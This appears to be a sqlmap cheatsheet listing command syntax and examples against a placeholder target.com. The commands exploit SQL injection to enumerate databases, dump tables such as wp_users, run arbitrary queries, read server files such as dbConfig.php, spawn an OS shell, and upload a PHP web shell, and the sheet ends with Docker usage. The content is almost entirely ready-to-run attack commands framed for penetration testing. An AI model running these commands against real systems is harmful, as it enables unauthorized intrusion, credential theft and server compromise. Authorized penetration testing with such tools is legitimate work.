SqlMap Cheatsheet


sqlmap is an amazing and super useful penetration testing tool that automates the process of detecting and exploiting SQL injection.

Get DBMS banner

Sintaxis:

sqlmap <url> -p <parameter vulnerable> -b

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -b

Get  current database name

Sintaxis

sqlmap <url> -p <parameter vulnerable> --current-db

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --current-db

Get current username

Sintaxis:

sqlmap <url> -p <parameter vulnerable> --current-user

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id --current-user

Get the list of tables in a database

Sintaxis:

sqlmap <url> -p <parameter vulnerable> -D <database_name> --tables

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --tables

Get the list of columns in a table

Sintaxis:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --columns

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users --columns

Dump table information

Sintax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> -T <table_name> --dump

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db -T wp_users  --dump

Dump ALL database information

Sintax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> --dump-all

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --dump-all

Spawn a Shell

For this you need to know a writable directory in the server, example /var/www/html/uploads/

Sintax:

sqlmap <url> -p <parameter_vulnerable> -D <database_name> --os-shell

Example:

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --os-shell

Uploading a shell

For this you need to know a writable directory in the server, example /var/www/html/uploads/

Sintax

sqlmap <url> --file-dest="<remoteDirectory>" --file-write="<yourLocalFile.php>"

Example

sqlmap http://target.com/vulnerable.php?id=123 -p id --file-dest="/var/www/uploads/shell.php" --file-write="/tmp/myshell.php"

Executing a Query

Sintax

sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --sql-query <sql_sentence>

Example

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_d --sql-query "Select * from wp_users;"

Downloading files from the server

Note, for this you need to know the file structure of server
Sintax

sqlmap <url> -p <parameter_vulnerable> -D <databaseName> --file-read=<PathFile>

Example

sqlmap http://target.com/vulnerable.php?id=123 -p id -D wordpress_db --file-read=/var/www/html/dbConfig.php

Specify vulnerability in url params

Sintax
[*] asterisk symbol is used to specify the vulnerable parameter

sqlmap --url https://target.com/articles/*vulnerable-param

Docker Version

1.- Pull image from docker hub

docker pull paoloo/sqlmap

2.- Create directory for volume. (results will be saved in this directory)

mkdir /tmp/sqlmap

2.- Execute image in a temporal container

docker run --rm -it -v /tmp/sqlmap:/root/.sqlmap/ paoloo/sqlmap --url https://target.com/articles.php?id=1 -p id